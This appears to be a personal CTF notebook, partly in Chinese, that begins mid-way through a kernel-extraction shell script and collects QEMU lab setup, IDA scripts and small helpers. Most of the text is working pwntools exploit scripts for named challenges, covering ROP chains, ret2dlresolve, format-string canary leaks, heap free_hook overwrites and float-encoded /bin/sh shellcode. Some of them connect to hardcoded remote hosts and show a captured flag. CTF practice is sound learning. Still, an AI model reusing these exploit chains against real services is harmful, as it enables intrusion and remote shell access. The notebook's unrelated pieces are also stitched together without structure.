		tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
		check_vmlinux $tmp
	done
}
# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
	echo "Usage: $me <kernel-image>" >&2
	exit 2
fi
# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0
# That didn't work, so retry after decompression.
# NOTE(review): in the upstream extract-vmlinux script the uncompressed check
# presumably runs before these; here it only runs after all decompressors fail.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd
# Finally check for uncompressed images or objects:
check_vmlinux $img
# Bail out:
echo "$me: Cannot find vmlinux." >&2
python&&C混合編程
使用python標準庫中自帶的ctypes模塊進行python和c的混合編程,需要先查找動態鏈接庫:
sir@sir-PC:~/desktop$ ldd pwn1
linux-vdso.so.1 (0x00007ffcaa9e0000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a323f6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6a327d9000)
from pwn import *
from ctypes import *
# Load the host's libc through ctypes so rand()/srand() give the same sequence
# the target presumably computes with the same libc.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = "./pwn1"
elf = ELF(name)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#p = process(name)
p = remote('111.198.29.45',30261)
if args.G:
    gdb.attach(p)
p.recvuntil("Your name:")
p.sendline('a'*0x20 + p64(0x1))
# Seed 1 matches the value sent above; replay the ten rand()%6+1 answers.
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    p.recvuntil('number:')
    p.sendline(num)
p.interactive()
qemu
打包:
find . | cpio -o --format=newc > ../rootfs.cpio
解壓:
cpio -idmv < ../rootfs.cpio
啓動:
#!/bin/bash
# Boot rootfs.cpio with bzImage under QEMU: serial console only, 256M RAM, one
# core, SMEP enabled on the virtual CPU, and a gdb stub listening on tcp::1234.
qemu-system-x86_64 \
-initrd rootfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-monitor /dev/null \
-m 256M \
--nographic \
-smp cores=1,threads=1 \
-cpu kvm64,+smep \
-gdb tcp::1234
關閉 kptr_restrict:
echo 0 > /proc/sys/kernel/kptr_restrict
IDA_IDC腳本
dump數值
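// Dump the raw bytes in [0x403230, 0x403617) from the IDA database to a file.
auto i, fp;
fp = fopen("D:\\dump.txt", "wb");
if (fp == 0)
{
    Message("cannot open output file\n");
}
else
{
    for (i = 0x403230; i < 0x403617; i++)
        fputc(Byte(i), fp);
    fclose(fp);   // the original never closed the handle
}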
dump彙編代碼
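// Disassemble [0x401000, 0x40106C) instruction by instruction and write
// "address: text" lines to a file.
auto code, n, i, fp;
fp = fopen("C:\\Users\\sir\\Desktop\\dump.txt", "wb");
if (fp == 0)
{
    Message("cannot open output file\n");
}
else
{
    for (i = 0x401000; i < 0x40106C;)
    {
        n = MakeCode(i);
        // MakeCode() yields the instruction length; 0 means it failed, and the
        // original would then spin forever at the same address.
        if (n == 0)
        {
            Message("MakeCode failed at %x\n", i);
            break;
        }
        fprintf(fp, "%x: %s\n", i, GetDisasm(i));
        i = i + n;
    }
    fclose(fp);   // the original never closed the handle
    Message("Ok!\n");
}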
python處理文件
'''
import re
file1 = open('sir.log', 'r')
file2 = open('sir.txt', 'w')
for line in file1.readlines():
if re.match(r'^name_cn.*\n',line):
file2.write(line)
'''
# -*- coding:utf-8 -*-
#! python2
import shutil
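a = 0
readDir = "./sir.txt"  # old
writeDir = "./new.txt"  # new


def dedup_lines(src, dst):
    """Copy *src* to *dst* keeping only the first occurrence of each line.

    Lines are compared as read, newline included. Both files are closed on
    exit (the original left the input handle open).

    Args:
        src: path of the file to read.
        dst: path of the file to write (created/truncated).

    Returns:
        The number of unique lines written.
    """
    lines_seen = set()
    count = 0
    with open(src, "r") as f, open(dst, "w") as outfile:
        for line in f:
            if line not in lines_seen:
                count += 1
                outfile.write(line)
                lines_seen.add(line)
    return count


if __name__ == "__main__":
    a = dedup_lines(readDir, writeDir)
    print(a)
    print('\n')
    print("success")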
i春秋_break
from pwn import *
# pwntools setup for the local ./pwn binary (32-bit: p32/u32 below).
context.log_level = 'debug'
name = './pwn'
p = process(name)
#p = remote('106.75.2.53', 10008)
elf = ELF(name)
if args.G:
    gdb.attach(p)
# Address the script returns to after printf; presumably this binary's main().
main_addr = 0x080486DD
p.recvuntil("Yo, what's your name:\n")
pay = 'a'*12 + p32(elf.plt['printf']) + p32(main_addr) + p32(elf.got['read']) + 'b'*4
p.sendline(pay)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.recvuntil('packing drugs...\n')
# p.recv() with no size returns whatever is buffered; bytes 4..8 are assumed
# to hold the printed pointer.
printf_addr = u32(p.recv()[4:8])
# NOTE(review): 0x13e80 and 0x12c24a are presumably deltas for the libc this
# note was written against.
system_addr = printf_addr - 0x13e80
bin_sh_addr = printf_addr + 0x12c24a
success("printf_addr " + hex(printf_addr))
success("system_addr " + hex(system_addr))
pay1 = 'a'*12 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'b'*4
p.sendline(pay1)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.interactive()
看雪_流浪者
#include<stdio.h>
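/*
 * Map an ASCII code to the index scheme used by the check: digits -> x-48
 * (0..9), lowercase -> x-87 (10..35), uppercase -> x-29 (36..61); -1 otherwise.
 */
static int alnum_index(int x)
{
    if (x >= '0' && x <= '9')
        return x - 48;
    if (x >= 'a' && x <= 'z')
        return x - 87;
    if (x >= 'A' && x <= 'Z')
        return x - 29;
    return -1;
}

/*
 * Recover the input for the "KanXueCTF2019JustForhappy" check: for every key
 * character, print each candidate x whose index in `source` equals it
 * (expected output: j0rXI4bTeustBiIGHeCF70DDM).
 */
int main() {
    char source[] = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ";
    char key[] = "KanXueCTF2019JustForhappy";
    int source_len = (int)(sizeof(source) - 1);
    int i, x;

    /* Stop at the terminator; the hard-coded 26 also examined key[25] == '\0'. */
    for (i = 0; key[i] != '\0'; i++) {
        /* The original loop used x < 122 (never tried 'z') and y > 0, which
         * skipped index 0 ('0') and so dropped both 'a' characters of the key. */
        for (x = '0'; x <= 'z'; x++) {
            int y = alnum_index(x);
            if (y >= 0 && y < source_len && source[y] == key[i]) {
                printf("%c", x); //j0rXI4bTeustBiIGHeCF70DDM
            }
        }
    }
    return 0;
}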
i春秋_loading
mmap函數可以使空間擁有可執行權限;
計算機浮點數的表示方法;
from pwn import *
import struct
# Remote target by default; the local process line is kept commented out.
p = remote('106.75.2.53',10009)
#p = process('./loading')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
    gdb.attach(p)
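def get_int(s):
    """Turn 4 raw bytes into the decimal number the target expects.

    The bytes are read as a little-endian float, multiplied by 2333 and
    truncated to an unsigned 32-bit integer.  The original round-tripped the
    product through ``struct.pack('<I', float)``, which Python 3 rejects.

    Args:
        s: 4 bytes (``str`` on Python 2; ``bytes`` or a latin-1 ``str`` on 3).

    Raises:
        ValueError: if the scaled value is negative or exceeds 32 bits, the
            same inputs ``struct.pack('<I')`` refused.
    """
    if not isinstance(s, bytes):
        s = s.encode('latin-1')
    scaled = int(struct.unpack('<f', s)[0] * 2333)
    if not 0 <= scaled <= 0xffffffff:
        raise ValueError("value %d does not fit in an unsigned 32-bit int" % scaled)
    return scaled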
# Each 4-byte group is sent as the decimal produced by get_int(); the trailing
# comments name the instruction the bytes encode. Payloads are Python 2 str.
for i in range(3):
    p.sendline(str(get_int('\x00\x00\x00\x00')))
p.sendline(str(get_int('\x99\x89\xc3\x47'))) # mov ebx, eax
p.sendline(str(get_int('\x41\x44\x44\x44'))) # nop/align
for c in '/bin/sh\x00':
    p.sendline(str(get_int('\x99\xb0'+c+'\x47'))) # mov al, c
    p.sendline(str(get_int('\x57\x89\x03\x43'))) # mov [ebx], eax; inc ebx
for i in range(8):
    p.sendline(str(get_int('\x57\x4b\x41\x47'))) # dec ebx
p.sendline(str(get_int('\x99\x31\xc0\x47'))) # xor eax, eax
p.sendline(str(get_int('\x99\x31\xc9\x47'))) # xor ecx, ecx
p.sendline(str(get_int('\x99\x31\xd2\x47'))) # xor edx, edx
p.sendline(str(get_int('\x99\xb0\x0b\x47'))) # mov al, 0xb
p.sendline(str(get_int('\x99\xcd\x80\x47'))) # int 0x80
p.sendline('c')
p.interactive()
[*] Switching to interactive mode
[DEBUG] Received 0xb bytes:
'try to pwn\n'
try to pwn
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2b bytes:
'flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}\n'
flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}
$
[*] Closed connection to 106.75.2.53 port 10009
XDCTF_pwn01
from pwn import *
# pwntools setup; section addresses are read from the ELF rather than hard-coded
# (the trailing comments record the values seen for this binary).
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr #0x8048330
dynsym_addr = elf.get_section_by_name('.dynsym').header.sh_addr #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
start = 0x804aa00
# Fake tables are laid out back to back from `start`.
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x7
n = fake_rel_plt_addr - rel_plt_addr
# NOTE(review): "/" is float division under Python 3; this line needs "//" there.
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system\x00/bin/sh\x00\x00"
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
# Label says system_addr but the value printed is fake_dynstr_addr.
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()
sha1加密
from hashlib import *
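def find_sha1_match(fragment, start=0):
    """Return ``(i, digest)`` for the first integer ``i >= start`` whose SHA-1
    hex digest of ``str(i)`` contains ``fragment``.

    Args:
        fragment: lowercase hex substring to look for.
        start: first integer to try.

    Returns:
        Tuple of the matching integer and its full hex digest. Loops until a
        match is found, so pass a fragment expected to hit in a modest range.
    """
    i = start
    while True:
        digest = sha1(str(i).encode('utf-8')).hexdigest()
        if fragment in digest:
            return i, digest
        i += 1


# Same search as before, kept at module level so running the file prints the answer.
i, result = find_sha1_match('40bd001563085f')
print("flag: " + str(i))
print(result)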
2017湖湘杯_pwn300
程序在計算加減乘除功能的時候,將結果保存在申請的堆中,最後將堆中的結果複製到棧中,這就導致了可能會棧溢出;
然後 程序又是通過靜態編譯的,可以在程序中找到合適ROP鏈;
ROPgadget --binary pwn300 --ropchain
然後程序又只能輸入十進制的數,可以通過ctypes.c_int32(j).value的方式輸入;
from pwn import *
import binascii
import ctypes as ct
from struct import pack
#context.log_level = 'debug'
# pwntools setup for the statically linked ./helloworld (32-bit: int 0x80 chain below).
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './helloworld'
io = process(name)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
    gdb.attach(io)
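def base_addr(pro_addr, offset):
    """Return ``pro_addr - offset`` where ``pro_addr`` is an address string.

    ``int(s, 0)`` replaces ``eval``: it accepts "0x..." (and plain decimal)
    without executing arbitrary Python should the string ever come from the
    target's output.

    Args:
        pro_addr: address as a string, e.g. "0x8048000".
        offset: integer to subtract.

    Raises:
        ValueError: if ``pro_addr`` is not an integer literal.
    """
    return int(pro_addr, 0) - offset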
# ROP chain as emitted by `ROPgadget --ropchain` (see the note above); the
# trailing comments are the tool's gadget descriptions. Each dword is later
# fed through ctypes.c_int32 because the target only accepts decimal input.
p=[]
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea060) # @ .data
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea064) # @ .data + 4
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x080481c9) # pop ebx ; ret
p.append(0x080ea060) # @ .data
p.append(0x0806ed31) # pop ecx ; pop ebx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x080ea060) # padding without overwrite ebx
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x08049781) # int 0x80
tempnum=0
#debug()
io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
# 16 rounds of option 3 with x = 0, y = 1, then one round of option 1 per
# chain entry (x = the gadget as a signed 32-bit decimal, y = 0). xrange is
# Python 2 only.
for i in xrange(0,16):
    io.recvuntil('5 Save the result\n')
    io.sendline('3')
    io.recvuntil('input the integer x:')
    io.sendline(str(tempnum))
    io.recvuntil('input the integer y:')
    io.sendline('1')
for j in p:
    io.recvuntil('5 Save the result\n')
    io.sendline('1')
    io.recvuntil('input the integer x:')
    io.sendline(str(ct.c_int32(j).value))
    io.recvuntil('input the integer y:')
    io.sendline('0')
io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()
西湖論劍_story
from pwn import *
# pwntools setup; remote target by default. Payloads are Python 2 str and the
# final lines use the Python 2 print statement.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './story'
#p = process(name)
p = remote('ctf2.linkedbyx.com',10955)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
    gdb.attach(p)
p.recvuntil('Please Tell Your ID:')
# The ID is echoed through a format string; %15$p prints the 15th stack argument.
p.sendline('aaaa%15$p')
p.recvuntil('aaaa')
x = p.recv()
canary = int(x[0:18],16)
# NOTE(review): 0x400bd3 / 0x400876 and the 0x24c50 delta are presumably
# specific to this binary and its libc.
pop_rdi_addr = 0x400bd3
main = 0x400876
pay = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(elf.got['__libc_start_main']) + p64(elf.plt['puts']) + p64(main)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay)
__libc_start_main_addr = u64(p.recv(6) + '\x00\x00')
system_addr = __libc_start_main_addr + 0x24c50
pay1 = "/bin/sh;%p"
p.recvuntil('Please Tell Your ID:')
p.sendline(pay1)
p.recvuntil('/bin/sh;')
binsh_addr = p.recv()
binsh_addr = int(binsh_addr[0:15],16)
pay2 = 136 * 'a' + p64(canary) + 'q'*8 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
#p.recvuntil('You can speak your story:\n')
p.sendline('200')
p.recvuntil('You can speak your story:\n')
p.sendline(pay2)
print "canary: " + hex(canary)
print "__libc_start_main: " + hex(__libc_start_main_addr)
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
p.interactive()
# flag{35d06db7c9b25265da7ee6a384ebef5a}
i春秋_breakingbad
from pwn import *
import sys
# pwntools setup for the local ./break binary (32-bit: p32/u32 below).
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './break'
p = process(name)
#p = remote('106.75.2.53',10008)
elf= ELF(name)
#libc = ELF('./bc.so.6')
if args.G:
    gdb.attach(p)
#0x804863c
p.recvuntil("Yo, what's your name:\n")
# NOTE(review): 0x8048470 and the 0x2a540 delta are presumably specific to this
# binary and its libc.
pay = 'b'*12 + p32(elf.plt['puts']) + p32(0x8048470) + p32(elf.got['puts']) + 'aaa'
p.sendline(pay)
#Methamphetamine
p.recvuntil('aaa\n')
p.sendline('Methamphetamine' + '\xff\xff') # integer overflow
p.recvuntil('packing drugs...\n')
puts_addr = u32(p.recv(4))
system_addr = puts_addr - 0x2a540
success("puts_addr: " + hex(puts_addr))
success("system_addr: " + hex(system_addr))
p.recvuntil("Yo, what's your name:\n")
p.sendline('c'*12 + p32(elf.plt['read']) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8) + 'sir')
p.recv()
p.sendline('Methamphetamine' + '\xff\xff')
p.sendline('/bin/sh\x00')
p.interactive()
i春秋_3.7Z
from pwn import *
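def login(data):
    """XOR each character of *data* with its index and return the result.

    Same transform as the original ``+=`` loop, built with ``join`` (linear)
    instead of repeated string concatenation.

    Args:
        data: text whose i-th character is XORed with i.

    Returns:
        The transformed string; empty input gives an empty string.
    """
    return ''.join(chr(i ^ ord(ch)) for i, ch in enumerate(data))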
#p = process('./http')
# Remote HTTP-style target on port 80; the headers are sent as one raw block.
p = remote( '106.75.2.53',80)
payload = 'User-Agent: '+login('useragent')
print payload
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
p.send(payload)
p.interactive()
# The second interactive() only runs after the first one is left.
p.interactive()
x計劃_littlenotebook
from pwn import *
import sys
# pwntools setup for the local binary; args.G attaches gdb first.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './littlennotebook'
p = process(name)
elf= ELF(name)
if args.G:
    gdb.attach(p)
def add(num,data):
    """Choice 1: create a note of length ``num`` with content ``data``."""
    p.recvuntil('your choice?\n')
    p.sendline("1")
    p.recvuntil('enter the lenth of notebook:\n')
    p.sendline(str(num))
    p.recvuntil('input the content:')
    p.sendline(str(data))
def edit(i,num,data):
    """Choice 2: rewrite note ``i`` with length ``num`` and content ``data``.
    No prompt is awaited before the content is sent."""
    p.recvuntil('your choice?\n')
    p.sendline("2")
    p.recvuntil('enter the index of notebook:\n')
    p.sendline(str(i))
    p.recvuntil('enter the lenth of notebook:\n')
    p.sendline(str(num))
    p.sendline(str(data))
def delete(i):
    """Choice 3: delete note ``i``."""
    p.recvuntil('your choice?\n')
    p.sendline("3")
    p.recvuntil('enter the index:\n')
    p.sendline(str(i))
def show(i):
    """Choice 4: print note ``i``; the caller reads the reply."""
    p.recvuntil('your choice?\n')
    p.sendline("4")
    p.recvuntil('enter the index:\n')
    p.sendline(str(i))
#0x4009A7
#0x60209C
# NOTE(review): 0x60209C / 0x602018 and the 0x82ba0 / 0x42510 deltas are
# presumably specific to this binary and its libc; payloads are Python 2 str.
add(20,'a'*8)
add(20,'b'*8)
add(20,'c'*8)
delete(2)
delete(1)
pay1 = 'a'*24 + p64(0x21) + p64(0x60209C)
edit(0,40,pay1)
add(20,'/bin/sh\x00')
pay2 = p64(0x0000001400000002) + p64(0x60201800000000)
add(20,pay2)
show(0)
p.recvuntil('0:')
free_addr = u64(p.recv(6) + '\x00\x00')
lib_add = free_addr - 0x82ba0
system_addr = lib_add + 0x42510
success("free_addr: " + hex(free_addr))
success("lib_add: " + hex(lib_add))
success("system_addr: " + hex(system_addr))
edit(1,20,'/bin/sh\x00')
edit(0,8,p64(system_addr))
delete(1)
p.interactive()
Asis CTF 2016 b00ks
from pwn import *
# pwntools setup for the local ./b00ks binary with the host libc.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './b00ks'
p = process(name)
#p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.G:
    gdb.attach(p)
def creat(nsize,ndata,dsize,data):
    """Choice 1: create a book with name size/name and description size/description."""
    p.recvuntil('> ')
    p.sendline('1')
    p.recvuntil('Enter book name size: ')
    p.sendline(str(nsize))
    p.recvuntil('Enter book name (Max 32 chars): ')
    p.sendline(str(ndata))
    p.recvuntil('Enter book description size: ')
    p.sendline(str(dsize))
    p.recvuntil('Enter book description: ')
    p.sendline(str(data))
def delete(i):
    """Choice 2: delete book ``i``."""
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil('Enter the book id you want to delete: ')
    p.sendline(str(i))
def edit(i,data):
    """Choice 3: replace the description of book ``i`` with ``data``."""
    p.recvuntil('> ')
    p.sendline('3')
    p.recvuntil('Enter the book id you want to edit: ')
    p.sendline(str(i))
    p.recvuntil('Enter new book description: ')
    p.sendline(data)
def show():
    """Choice 4: list books; the caller reads the output."""
    p.recvuntil('> ')
    p.sendline('4')
def change(data):
    """Choice 5: set the author name to ``data``."""
    p.recvuntil('> ')
    p.sendline('5')
    p.recvuntil('Enter author name: ')
    p.sendline(data)
# leak the heap address
# NOTE(review): the 0x59c010 / 0x3b68e8 / 0x42510 deltas are presumably
# specific to the libc on the author's machine; payloads are Python 2 str.
p.recvuntil('Enter author name: ')
p.sendline('a'*28 + 'q'*4)
creat(128,'b',32,'c')
creat(0x21000,'/bin/sh\x00',0x21000,'/bin/sh\x00')
show()
p.recvuntil('qqqq')
heap_addr = u64(p.recv(6) + '\x00\x00')
# leak the libc address
pay1 = p64(1) + p64(heap_addr + 0x38) + p64(heap_addr - 0x30) + p64(0x32)
edit(1,pay1)
change('a'*28 + 's'*4)
show()
p.recvuntil('Name: ')
libc_addr = u64(p.recv(6) + '\x00\x00') - 0x59c010
free_hook = libc_addr + 0x3b68e8
#one_gadget = libc_addr + 0x4239e # 0x423f2 #0xe317e
system_addr = libc_addr + 0x42510
success("heap_aadr: " + hex(heap_addr))
success("libc_addr: " + hex(libc_addr))
success("free_hook: " + hex(free_hook))
success("system_addr: " + hex(system_addr))
# write system_addr into free_hook (one_gadget_addr would also work)
pay2 = p64(1) + p64(heap_addr + 0x38) + p64(free_hook) + p64(0x32)
edit(1,pay2)
pay3 = p64(system_addr) + p64(system_addr)
edit(1,pay3)
# get a shell
delete(2)
p.interactive()
WhaleCTF_逆向練習
#include<stdio.h>
#include<string.h>
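/*
 * Rebuild a 17-character string by picking bytes of `str` at the positions
 * listed in `num`, then print it.
 * NOTE(review): the trailing comment records "e2s6ry3r5s8f61024", but
 * str[num[0]] is str[1] == 'K', so that comment does not match a direct walk
 * of these indices — verify against the original challenge.
 */
int main()
{
    int i;
    /* 17 selected characters plus the terminating NUL. The original sized the
     * buffer 0x12 but never wrote the terminator, so printf("%s") read past
     * the initialised bytes. */
    char flag[0x12];
    char str[] = "sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138";
    int num[] = {0x1,0x4,0xe,0xa,0x5,0x24,0x17,0x2a,0xd,0x13,0x1c,0xd,
                 0x1b,0x27,0x30,0x29,0x2a};
    for (i = 0; i < 0x11; i++)
    {
        flag[i] = str[num[i]];
    }
    flag[0x11] = '\0';
    printf("flag: %s", flag);
    // e2s6ry3r5s8f61024
    return 0;
}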
*ctf_quick
from pwn import *
import struct
# pwntools setup; remote target by default, libc symbols resolved from ./libc.so.6.
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './quick'
#p = process(name)
p=remote('34.92.96.238',10000)
elf= ELF(name)
libc = ELF('./libc.so.6')
if args.G:
    gdb.attach(p)
p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('2')
# Each "number" is a 16-byte decimal field followed by raw structure fields;
# NOTE(review): 0x804a024 / 0x8048816 / 0x804a02c / 0x804a018 are presumably
# addresses in this specific binary. Payloads are Python 2 str.
pay1 = str(elf.plt['printf']) + '\x00'*(16-len(str(elf.plt['printf']))) + p32(0x2) + p32(0x0) + p32(0x0) + p32(0x804a024) + 'a'*16 + p32(elf.plt['puts']) + p32(0x8048816) + p32(0x804a02c)
p.recvuntil('the 1th number:')
p.sendline(pay1)
pay2 = '134514016' + '\x00'*7 + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a018-4)
p.recvuntil('the 2th number:')
p.sendline(pay2)
p.recvuntil('Here is the result:')
x = p.recv()
# Bytes 64..68 of the unsized recv() are assumed to hold the leaked pointer.
lib_main_addr = u32(x[64:68])
libc_addr = lib_main_addr - libc.symbols['__libc_start_main'] #0x18d90
system_addr = libc_addr + libc.symbols['system'] #0x3cd10 #
binsh_addr = libc_addr + next(libc.search('/bin/sh')) #0x17b988 #
print(hex(libc.symbols['__libc_start_main']))
#p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('1')
# Reinterpret the unsigned address as a signed 32-bit int for the decimal field.
x = struct.unpack("i",p32(system_addr))
x = x[0]
print("x: " + str(x))
pay2 = str(x) + '\x00'*(16-len(str(x))) + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a024) + 'a'*16 + p32(system_addr) + p32(0x8048816) + p32(binsh_addr)
p.recvuntil('the 1th number:')
p.sendline(pay2)
success("lib_main_addr: " + hex(lib_main_addr))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))
p.interactive()